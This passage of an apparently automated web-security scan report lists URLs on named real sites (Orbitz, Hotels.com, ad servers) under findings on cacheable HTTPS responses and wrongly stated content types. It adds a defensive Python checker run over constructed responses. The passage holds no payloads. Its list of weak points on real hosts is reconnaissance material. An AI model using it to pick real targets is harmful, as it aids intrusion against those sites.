27.71. http://www.cmegroup.com/advance/trade-1.html

27.72. http://www.cmegroup.com/advance/trade-2.html

27.73. http://www.cmegroup.com/advance/trade.html

27.74. http://www.cmegroup.com/advance/world-advances.html

27.75. http://www.orbitz.com/App/ViewDHTMLCalendar

27.76. http://www.orbitz.com/cacheable/ad.html

27.77. http://www.orbitz.com/cacheable/ad_empty.html

27.78. http://www.orbitz.com/cacheable/cedexis/radar.html

27.79. http://www.orbitz.com/cacheable/empty.html

27.80. http://www.orbitz.com/shared/adserverProxy.jsp

27.81. http://www.trip.com/box_ad_refresh.html

27.82. http://www9.effectivemeasure.net/favicon.ico

27.83. http://xml.premierleague.com/crossDomain.html
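
Sections 26 and 27 above come from response headers alone: a TLS response with no Cache-Control: no-store, no-cache or private (or an equivalent Pragma/Expires) may be kept by a shared proxy or the browser's disk cache, which matters for the login and reservation pages listed, and an HTML response whose Content-Type carries no charset and whose markup declares none leaves the browser to guess the encoding, the classic enabler for UTF-7 style script injection in older browsers. The Python below is an added example, not from the XSS.CX report; it reimplements both checks plus a magic-byte sniff for the "content type incorrectly stated" category that follows, over constructed responses. The URLs login.example and img.example and the three sample responses are constructed.

```python
"""Header/body checks for cacheable HTTPS responses, missing HTML charset and
a stated Content-Type that disagrees with the body. Added example; the sample
responses and URLs below are constructed, not captured from the report's hosts."""
import re
from typing import Dict, List, Optional, Tuple

META_CHARSET_RE = re.compile(rb"<meta[^>]+charset\s*=\s*[\"']?([\w-]+)", re.I)
# (magic bytes, MIME type the body actually is)
MAGIC = [(b"\x89PNG", "image/png"), (b"GIF8", "image/gif"),
         (b"\xff\xd8\xff", "image/jpeg"), (b"%PDF", "application/pdf")]


def parse_response(raw: bytes) -> Tuple[int, Dict[str, str], bytes]:
    """Split a raw HTTP/1.x response into status, lower-cased header map and body."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status_line, *hdr_lines = head.decode("latin-1").split("\r\n")
    status = int(status_line.split()[1])
    headers: Dict[str, str] = {}
    for line in hdr_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body


def cacheable_https(url: str, headers: Dict[str, str]) -> bool:
    """True when a TLS response carries nothing that forbids storing it."""
    if not url.lower().startswith("https://"):
        return False
    directives = {d.strip().split("=")[0].lower()
                  for d in headers.get("cache-control", "").split(",") if d.strip()}
    if directives & {"no-store", "no-cache", "private"}:
        return False
    if headers.get("pragma", "").lower() == "no-cache":
        return False
    # An Expires of 0/-1 also defeats caching; a real past date is not parsed here.
    return headers.get("expires", "").strip() not in ("0", "-1")


def html_charset_missing(headers: Dict[str, str], body: bytes) -> bool:
    """HTML with no charset in Content-Type and no <meta charset> in the first 1 KiB."""
    ctype = headers.get("content-type", "").lower()
    if not ctype.startswith("text/html") or "charset=" in ctype:
        return False
    return META_CHARSET_RE.search(body[:1024]) is None


def sniff_type(body: bytes) -> Optional[str]:
    """Small magic-byte sniffer; None when the body is not one of the known kinds."""
    for sig, mime in MAGIC:
        if body.startswith(sig):
            return mime
    if body.lstrip()[:64].lower().startswith((b"<!doctype html", b"<html")):
        return "text/html"
    return None


def content_type_mismatch(headers: Dict[str, str], body: bytes) -> bool:
    """Stated media type differs from what the body's leading bytes say it is."""
    stated = headers.get("content-type", "").split(";")[0].strip().lower()
    sniffed = sniff_type(body)
    return sniffed is not None and stated != sniffed


def audit(url: str, raw: bytes) -> List[str]:
    """Names of the findings that apply to one response, in report order."""
    _status, headers, body = parse_response(raw)
    findings = []
    if cacheable_https(url, headers):
        findings.append("cacheable-https")
    if html_charset_missing(headers, body):
        findings.append("missing-charset")
    if content_type_mismatch(headers, body):
        findings.append("content-type-mismatch")
    return findings


# Constructed samples (hypothetical hosts and paths).
SAMPLE_LOGIN = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\nCache-Control: max-age=600\r\n\r\n"
                b"<html><form action=\"/login\">...</form></html>")
SAMPLE_FIXED = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n"
                b"Cache-Control: no-store, private\r\nPragma: no-cache\r\n\r\n"
                b"<!DOCTYPE html><html>...</html>")
SAMPLE_GIF_AS_HTML = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html; charset=utf-8\r\n\r\n"
                      b"GIF89a\x01\x00\x01\x00")

if __name__ == "__main__":
    for url, raw in [("https://login.example/customlogin.do", SAMPLE_LOGIN),
                     ("https://login.example/customlogin.do", SAMPLE_FIXED),
                     ("http://img.example/1x1.gif", SAMPLE_GIF_AS_HTML)]:
        print(url, audit(url, raw))
```

SAMPLE_FIXED shows the header set that clears both findings for a login page: an explicit charset on the Content-Type and Cache-Control: no-store, private (Pragma: no-cache only for HTTP/1.0 intermediaries). The sniffer is deliberately small; a full check would follow the MIME sniffing rules browsers apply, which is also why a text/html label on a GIF is worth flagging even when the image is harmless.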

28. Content type incorrectly stated

28.1. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1310831078

28.2. http://a.monetate.net/trk/3/s/a-06b34e08/p/travelocity.com/1982940443

28.3. http://a1.interclick.com/getInPageJS.aspx

28.4. http://a1.interclick.com/getInPageJSProcess.aspx

28.5. http://a2.twimg.com/profile_images/1470671793/ProfilePhoto_normal.png

28.6. http://ad.reklamport.com/rpgetad.ashx

28.7. http://ads.pointroll.com/PortalServe/

28.8. http://adserver.teracent.net/tase/ad

28.9. http://amch.questionmarket.com/adscgen/st.php

28.10. http://api.connect.facebook.com/restserver.php

28.11. http://api.facebook.com/method/fql.query

28.12. http://ar.voicefive.com/b/rc.pli

28.13. http://as00.estara.com/fs/ruleaction.php

28.14. http://ats.tumri.net/ats/ats

28.15. http://aud.pubmatic.com/AdServer/Artemis

28.16. http://calls.esitemarketing.com/euinc/getnumdata.js

28.17. http://calls.esitemarketing.com/euinc/number-changer.js

28.18. http://content.pulse360.com/0802A570-D4D3-11E0-8F5A-3A5C91016B62

28.19. http://content.pulse360.com/D712CB66-D4D2-11E0-ACD9-355C91016B62

28.20. http://content.pulse360.com/F09A1BDE-D4D2-11E0-99F0-875B91016B62

28.21. http://event.adxpose.com/event.flow

28.22. http://expedia-www.baynote.net/baynote/tags3/common

28.23. http://hublotnation.com/wp/wp-admin/admin-ajax.php

28.24. http://hublotnation.com/wp/wp-content/themes/hublotnation/ajax/socials-postings.ajax.php

28.25. http://i1.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

28.26. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_20x20.jpg

28.27. http://i2.goal.com/files/images/stats/goal/team-logos/7/97_48x48.jpg

28.28. http://i2.goal.com/files/images/stats/goal/team-logos/8/98_20x20.jpg

28.29. http://img.agoda.net/images/default/bg_tthome.gif

28.30. http://img.agoda.net/images/default/google_search.gif

28.31. http://img.agoda.net/images/default/mouse_overbg.gif

28.32. http://ipinvite.iperceptions.com/Invitations/Javascripts/customInvites.aspx

28.33. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=3125dce2-22e1-4ce3-935f-df4c7ea1656d&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=11&DAYSUNTILEND=13&IPGEO=807.SANJOSE

28.34. http://media.hotels.com/html.cms/TPID=42&LOCATION=HOTELS&SUBLOCATION=RESULTS&PLACEMENT=DCOLMID1&DEST=BOS&LANGID=1033&TILE=caa512d6-1516-43ee-bbf3-3a77a92da226&ADSIZE=180x280&NUMCHILDREN=0&DAYSUNTILSTART=1&DAYSUNTILEND=4&IPGEO=807.SANJOSE

28.35. http://now.eloqua.com/visitor/v200/svrGP.aspx

28.36. http://orbitz.tt.omtrdc.net/m2/orbitz/mbox/standard

28.37. http://orbitzaway.tt.omtrdc.net/m2/orbitzaway/mbox/standard

28.38. http://ots.optimize.webtrends.com/ots/ots/js-3.…

28.39. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f7564c0bd885b189dd2c0689c8a135b34e13fc5045e2d98a069be11f8167050f8807b19d0c3f89cee5920595b5c06102533ba2e325817ebf4032d6106530f3b97c92b4f6e3e4359612ac322af65b42af52007fe3a2ae2e1a65aa10c520449f40a0b27eb0418a84600ec28c7be9662afd0584e35d9373f46daf655c8f115cc82f8c09cd39719abb36dc59c00fc279633b734891ffc4ebc13d6bc2e2bb92db9dfed8a8ae163e4de1dbd7d1cb554051a04b2a47dd17d2484164308345d55bcfc7d88a31c02b0444b93c621d2543fc71496b653ffda87966973320483e11103901c3881bce99a6b422be5f73883eb43913437e61e4ecb5341e5a1517ef7dd8ebcbf314c51f4187cd197aba019e1c1da665f9d80ed3a322e1dce4690e4f3de97bfca95d662b6a4e8fd4344f5c8879c9e4ef2b9efce3b901c370fc01046a077adfc21053525c5abafb4e000898f7cc495851aca6fb5aec12f60e4c8397fbdbba3b422e12b54a9834487952ac58c03bd8dbb5e2577005b409d849a2a4b3acce676f013e5df2cf539b1f07f6aed85dbcc4ad228f8cf28a7f440da651282427493b5837e322f47dbd598911423263c926c92318c00815dd25724b35ef037392091c5d88da9a57a412d1f74da3b580f6fd7c5dab2ca7dafb2d87223056daf90f1992685708e716157b88f514acfcecaf49c4003d0b82115796769084acc7abc6276fbee3484b9cc674d5ab4cc623f08a5d68392f40be29c2faa7d320b0793862444364c04b1e1312d4ccc7b16a627285c944098f6b1be3d9837734338673704af4ff8695b70964afc463dd8f8f233c34518bba5dea59d369c5aa49f5a5189040aafb91a68054aa3ea49691de9f56bab651b864e900cbcc726cbb15e1880bdb54fe6fa6be44e5e4641388b87511e0744b99ff812fa7508002ec727d6cbae0588d2c1612f43a951de3e58281c5fb5e91074126ea6a75a16cc8e24807672a29d5193bc8a8f44433f6119ecab6d81398371ef5a3d79cdf21fad6702b3a498e813965d00ef3625272753729385f0c0f18246e30049e1af2a880017759733244a9107a360a6997f7072a5ecda6ef00d791239f854af9aabf004cd52a781af35d7757a05b0f92dbe77930c396a7eaa1dfb343f32e44d6a16584af5b2a51a6bd17a9bafe871c6136a7f3cd5f9f5613fc69da81484206e5b368845d9caf38b88884a5df0a10b193cc028f0591

28.40. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.41. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.42. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.43. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055927ddb41e1ab3c4dfe25c82155fe6878260b41373be772bf742e24a21cb3a7b7f140edfb3610a58c31ea77fff310223ec1baf1d5ecff568d0d63ebb577ecee7077793963acb349fbdc15cef630cbd8a1dac93d1848d94125933f465af4ed0d5fe447574a1bbd645cb3745f27bd76647f131db41e94298d4ae9b9f5ef6d03a5ac85c69516c001ae6daa0d55c7b351195f48f75e4010c883f29dda6b0193c4ef67fb0912fa4b03e8dd8b40d2b455a54e7821f06486b72501acf4f0885cddaff2156f2d5adad553ea1ac27b31c311333ca1a47e8fb0aeb7e37a9e15f06133b60454ba4d766dfee1da533f35ec7b966610c010f2f054cd2afa88761deeaf7cbf4b2fec1687fa52935cd257806e69b32a03b566da5980642af3e6769f1fab519c223a2a7c4490f6c0e3d5247d86bde9ceacccbf88f5a21c2c09a38c9ed1941e797c935a3345970fca5b1b2774d756c14caba0b0ff4fb23a0f51e56179093f2a8d350e373328feb37070902c204a371316330fc89e1cd399b3ad39d8383eca7de72818567a76eefabc321e5a1517ef7dd8ebcbf314c90241f4b03351a216d1441dad65e4d469a2e766a297f5621b4b2ae170f5a84a73300d29cc8e68024f9c2e8caba07ab381baef3bed0d807376660c6b87910746493b15f8fb12415dd3af8f1d0e14e7a6ed5ad506e6434cdbcbbdccec645d291fb71fc02008282fb14bde3cdc99b9df5d757bf7559d4ddac4e7ac917c3004380ef7c857cb1d01f7adde5ebdc9f67080ddf58d2b1e5efc052a2029423c0e3ce776f178e65f8818406637ca22cb7344955c418920751b39e10720915a485cdadf9404a415daa24ff0e3d4faae2a5cfc7ea0d3af78d077315289ad5d13c53f540abb471578def215f9adb4f81cc100610d84145291229ed6ac95adcc263bb2e2481bc095
74d7af19c12ea78f5b6a327b4bbb25c6aff1812eb47c6366124333924a1d4f4ed19e97b43e372285cd1257823f40b0ded3763f3bd0777f4df3f7d592f34073c88a76c086857e3c7d5184bb0ab019d02a90a91aa7ab45c014b8bed9bd023423f3

28.44. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.45. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91a90778dc721fe97f4897da4835dcb9e3e3aaab198134fdae2725d8d6acd629e18f47328d650e85b625e168132b70ae847574d5655ab8ca05f460e827a694331c183973c895166f93de6bd65f350ac92835a6e7caec8207cc7faaa7666781c6e4886f1b6d99f398e25c31dbb02e9505e02212a4972fd4e3a4d5a51adde96a58723297ad9f544a13909f2c1277ea8ed8a51d2f4af015479fc05eec5dcc31353d97ada151c7a325a8c908d8064267ea875c0387d2b341e1feb1391aec2b32043164ec9e9b41184b183524978a1ec5ea3a715236a2d75407c3210aa10dee1c9d115573880bf055b27ece43f6b67250d626c3324dfc5f24665e19610aff21f06f7771fc5585dd90b50aa6c8281c8ebd2ba97ac4f849060f9bf5a8a7978a5df974008bda0bbcdc493071284fadbe1b9ece4490b55e8bc9d291f7261065f9772a81190210a5df2d53b3093a1e5baf6e4ee0281a66a1200432074bc2539f7fc318bbe2aee8205ba4b993c3d818c00abe76ae154ac4be1e16444df65c4d12929eb19ccc370786dda475b94a1dba4d45e0d49d109ce11f81671825f00bbf913c3d8496ffde4bb1e6a37a34610386c5149849847672b9277865f2d62bc9bcacedbe7bcc01b57b25f75119f416553cf0f9e3382818c37ba75532e024d0cc67f455cbf5112b9bce05b92d3eab5ac2a255a919c446c40134ec755ef66acc0a80662af3e760920bba4deb34233b0b23e7af8080927a2990a6f8cc86f68cb9d3df724b2e85caa480cc5d524a85713650c145b71a5a7929c45ddb48a1a7bffa54b73e0852fe69740434298d340d36343feba83b21c070571c72474b280cd2d25888cdb3ad39d8103f9073ea6456062434f0e3b43706520b52b917d0e3b2bb5287572dc4981551aa05c13f7df265f2d453c4ab23acd8e53d5c1c37b274f0a94c7b385428c3963c1c47d3689cf3a53cf195a6fb0f8d64f0460d76037b8bcd46595e0551b9e719160185b58116091bebe7e7408454b343178f9ab6cfe562577f19b64e907c0f2b6eaa50b82e9b80ff985b6332a659cd4986d1bce8c7233c0d3e59f69003cf1904f4aeda59b59ef975dcd8a38c791f5aae5725292f453c5a33e575fa2ee60c8e4a1f6765ce21cf7514c20745d827764c69ee052396594c0dd8d8c657a54ed0a74ef4e484aaa82c5aab7da3ddf83e9d335131b0de6c6986641702ba040f3ce29b04b9a5b4bf15d106770e8317549a7695d5acc7e1c4266bb1ee4641c0cf
26ceab199321a4850164327f56ec2fc5a8f18921bd706c2e45032e8322745e5e8eca81ed7d633fd7ce0e5e8a7212b38bd27a3f3b8e7b705bbdedecf9e0512b93912dd1d3c26b7b4639c7fb06a959d36991b51ef5a24bc71da3fb9cf69e55bc37eb8786d7de09eacb0aee15eb0780d3303fe70de0881cd74fba61e6bd10e2e63215d8be211ab5764ecdfe8c27f005d144a2314028feff49cc2f540fa135c148e2f38c9a99f45f96531521ed6f27a53ac8e71a05647b718d136d92aba34c33f5139ac8e7df17cd6f4ff7a58fca8a23ffd5727d3e4ad8d46e66810bab63577720342c6d080d061f22693154cb4ff8ac81002359706213af427a62063dc0ae05245f9eaaed0dd7c824cbd64eacf4ed034d802b7f4af409215bf10f0c92dce57232c793a3e6abdabf4ba22b4583f63180f95a2452a3ef19a7b1aed4406a32a1a1ca57995641a23bd2851b1653e7e46fd65dcffa3be2858ef8df5e51fc8a87f861d8ba8edbeb93527d2f08308f06b02e4c782d206e57f58b0cbc9813b96bf04fac7df0c06130f8d0385b04d12a96

28.46. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.47. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.48. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.49. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5f17400eebc8ad58213ce16bc76e20e58ddb0521b5346b74a4c0b939fab858b3845c5caa275bc4214e60652fa9aa826b79c23b45e6234f1698d945b37d393f4800dc3a2a9476e2d5ed2d305ea49962b64c3436639f0bf7addb8f9b9e12c8519ea7235d21c5abd3d7908bbb3cb7f0a2af95a84640afa25d7ce67c628fb921a16d88849f87d3fc71f87e7419344c94c9c1323fe7456a364ce5d8d6724f1fd739c1cac4a83263f2979488ce483ba917a1990a0ecd4c893e99feff5432c51f3a68c87965f494d925c31489802d15f032f689206a648a9d2f7bc0dfa475111832c2541355de16a1f3c2678feb3792b9330741c6017413d02c6951bccc9a8b82de25772df23e13f44417b6eede2ee36065d431eea7dd3b7cba811de4f509edd201df746c4470dae7efd9506c5a523fe8eef3b5a4362e076fcf94d7c3b0474c9933a1b478b3ecbf1f03da2c7f2ab59dc60a3145422052fdbcd470b595d50e9e319190f85e380470d46bbe2e34f825cb0104cd4c0be9de734592e19b94bc22f0b7b34a958b37a9b82f9c8006566f05e9b1fdbd5efb8c0706b546f5df1cc09994c53f2fddb5cbdcfad20dd8caeda6a0a4ac96042564e322c0327bb23e135a765e65c523e35de2ade710f970e16d92f714c3ee1053f915e48588cd29a5af840cdf54cf4b683f7a12656af63a3d9f82b84283f5dd7ae121b8672173481535773dfe64beff9fba901c207770e811752977a9fdea3c2edd93705d9ae0b159bd5
2ac2ab088e34cee34d2867335ae73ec5b1f58329b27d63394c19348f4c051a0496dcceb42c2033cada7f18ce724eefde8062313b83757f5babedd5c5f14625c7812596dbd375692a55d3ba0de51fcb6782c458b2bd098141e8ee93f98552ab24ffd09783844bfcdf15ad2cfd41cd8a6a6ce410e38848d815fa6da7e345e4b46612ddbf7614bf714fcaa8d77bf303d453ed252d68b9b40fdc2c4715a768c049eae0878fcdfe0593004576ef3020a76c9eb01955607d2ddf183796f9a11232a0449899e98d449b371fa7a188cad976fad6267b3b4ad8df3963d05af9355e2323627f650a5b0315763e3e50cb1bf4f9d20d770827621faf142f690d6b91fe55225cc1f9ea56879a729cd74ba8a4ba5648d17d7d1af5032e00a0095a93d6bd7364c4cbf5bda0ddbf14f07d45d8f335d1af007900a7ba1bfee0ff8b186837a2a5cd569c5605b9249e02cf94a7

28.50. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.51. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fa7b06e8a285cd8557c816bb73a1054dd6f61c085541b14b0f1cdc85bbc6c13104c5d4e138b4441efe4d0df29ac219ca9f33aa597333f06094a72f0b8693f583078ca7a20868390dd09a51f64f9632368b476625a1b97fdeb7fbe3ee2e9f15fc753db61b44d95d1c6d908adf73080ff95a857114d212e9df7fc023f7926c1affcf77ff603dec1e90cc59b840d67c805e76b06755b56dc15c816627f1e4749c07ae4b98253a37795a90f6d2ffd57b3693a6c9d99ecaa3c9a7a2527c08b4dbd7d1ef687965b66d7c1e975c8c4819341ab9128d14f9b1bdee50ad380f57e1607502342b902a0c35352af2b371709e343f483515143f0fc99e12cb86a0b22ab052728728bd3c0c456974ff8bd27744064404e26ad0fccbe513db005298de7110f64ccb4609be6beaa96988e67faccfed7a085828f21c9bea0b2773172bd891771d4d836ccdfffa31f995b8fc42887cb3575827453bccd907351c104cefba115a4bd9ee95130217e8bdfa0cd23ab3116e9c89e3d09b38184a5fe50c93587e762fa74be77fcad2faca5a3666a5599e4a86d7e4ecc7733b506d0fa6cc09cf1a56faa0dc59bfccaa26dd86f48b704209a9012b257d48680e37e775f52dbd038c4b143731ce21cd7914c25b15db25224b3bee5373935f185a89d99254f340d0f11ef6b280f8fa7d57a97bf7dff879d0253f5789af0b4e906e0259ea13157c8af715fefae0a517c4043d0ed61354c4279387ad91fbc67362e5ee491d9b94
28d5ab48c026f3da596a3f7140ea7890f9f1807be6793e6641163ac21e4d1318d29893e16c3721d3cb0243980354f494882062679b747f4ca7f6919cb7407796802197808477612c0082bf53eb1a8d28c4b903e4cc0b860aefb0c1b29d53ab33f3cbd0809f1cac8b43fb29fd469fdc6b6ab046e78448d743a93ea6e917e4e43311dabd2011e0744e9affd57dfa06865fb7252769bab308d9291514a338c41bbfe2d3d9c5fe539f021722ba6875a46b9ae61b01352b7bd8133bc0aef41132a2109c99b6de15c83543f0a38fc8db26aad571263c1ddcd13d64d45ea865522576347b3f0d0d044a746f350acb15f7ff8856755a7c3212ab422a680e6ec1ae07755dccf9ed00d5cb749d874ca9a0bd514f81777a17f65d705af40a5d948ae67c37c6c3f9e9a1d8be17ac7c4e82a33f87f30d2454a9bb4bfdb2fbd7483e61a6a0cc5f955742fc6ec1cb515d04b739fb

28.52. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2b69577da9d14849ca3810ba1be51a94485c3b8d0df1139a67ca57bdad2954a81df26e54b2515e10536c19069a4897652328a51ea4f9befe56dba76741e6d873e633a9c1581835bbbeffefeadd0dba214499d00aacba2b2e2c7b20f4f61bd3986191a223c0d8e58ce23a4f38a25f3f815e425df5eb151ca719121e4ce12004ad271c68e56b4664154de05d88349654b2faf5fc7f16e2bac9d79708c50bf372bb011bcef75d195f4ab356470c9fcda4caf90136b4fd8c4e926d24d97b0eb9dbcb5a8aff45d83f1e109708e3c30731cdc9f3840fc3a7a0143c365b818e56ff1dc73d6ecc56644eb3a56cfdc888e8a74bc251be3275e34e1ac03862018d97dd492c6fc35b877512cc01dae84ce61df7b64626c7de12ae2565ac4fc5a605fb02920dc1052cef7041a76cc8589b7c30b6ba24da6ffa0bce7e2d236b1ed2b395f1db2a0082a0a1c999ccb9c6aab9133844f3c3d9958c5e4314854f6b15d701d9585326708751cc48fdf1b5a803e26b0d56e13c7257372cc1325c653c29f3b3717e9e34211b3242403900c5921a98cca2e47abe547e8625b13a1415786befb2b934520a4215ec71d4e2c0ff47dc1b519a8e2017ff47904709a826a9c20299f424f7d9b26b0f4c35e670a6ae4b7c6b027799946e1f188769cbfea730f796afae58d86aa01603215571dfc0400b0f0257b8b31e1a5ad4b38f105811ecb7b31e865ce6181e8a9fb69ee6345e7c49b6499728042e34fe5ce4729c84af9d01356ff4549842d482bfbf922038533f0af49904931657f6a1cb14afaa9b4effeed499720401fa163132412e7b4d68b365f93bb414881817626cc923cf7712880e14d920714634ee0e278e5c4a5e8ede9a5bf84ed5ea4ef6b081fba12756a17bbcdbeb30934e59109bf55e089e7c0445e608122e93f542fcffe0a416cb0f6f1d9e043afd36d28bf8d6f5d72478aaf920278d83
7d9ab8108027bf8d0b6d3d7c41e424cca9ea8136b4662f74194271d35f07097594dc8db4303c6594974c428d6516b683c83b675d87720709e1a3cae8fa521584d667c1a3a2297b2344d4bb09b64d8f2991ab4af3a54d9715a3a197f68201a331a797cadf884ea1d113ad78ad1699da6738b218b3d01ed440ad38fdbd44b4b06314deb47d16e4761a9dfb852ffb07d602bc202d39bee704da281510f739c44ceae7858ecff80794041524ee6a7fa76f99e71c06357b71de4c39c7f9f44432a51698ceb2db169e6548f3afd69edc76ffd7722f6e1cda863d30d65eac6c052622667e3f010f064e236d6454ce1af4f28902255f226117fe447834596e93f700700ec0adbd04869f76cf831aa9b0a21776c33a3042a85f734ef4000b93d6a670209691a5bcfb8cb940f0714ed3a23386fd5b7e51a9ae52e2fe054e9eaa

28.53. http://ots.optimize.webtrends.com/ots/ots/js-3.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

28.54. http://ots.optimize.webtrends.com/ots/ots/js-3.0/79569/e991de2af10a4f7a15a4dff8827f1c1c6378512bce05e0c31c3f6f8e37962c585c6705cd84f14ee547586bd08bf17d5d9eaeb2f1f97956b47b3b786423962bf70619619bd6049732c1be279005500c91ba0971cd7619e02a46998b633dc0a9c7adf9e804cc7cb2bb2a58c5c589c33bf8912b67d81456c2a578cf41146c0cfe95766ed90012f5e002a278e676ad9a2e12157e16849539679fce679b0b355ed2282da2a7cab5d3069a6fbb90252fd79d8bc5631f6b97e9df884835d1aa339b1db20f00a0c76c95e5b8c9ab179a9a7059773289f5d4594b55d3c9641c30a2cdd9b75a2643b61a5180eb55ca54c628392ac6b5b94dc1a230efca05cd1e5130aadc55428fd2be53b4a1ab7731f3680e19392de0828a56481f5b29398c944586ea2f67577bacd75f1782291db413e5148500103e9901f9138f3ecc45e1a17351e327846c1b8e797a0b3a413d308571a1642331ee41fbb8e7a116b4a76f41fdcb35b053e4fd0d4f4887a3e6fa9f9444be3347958846ece8717f653867a1bb55d084039dae6cd593e38cf3381b76f9412798114c13eee60d18ac04040f44e23a0def691164a4690571135ce1499229d752a7fbf8e53656e8a18bdf9f1fd25ae761ed3c7dec882b3b64609e6a6e20dbcfbcdb912759d584f823b5185ca4150ce4959a07dcff5ac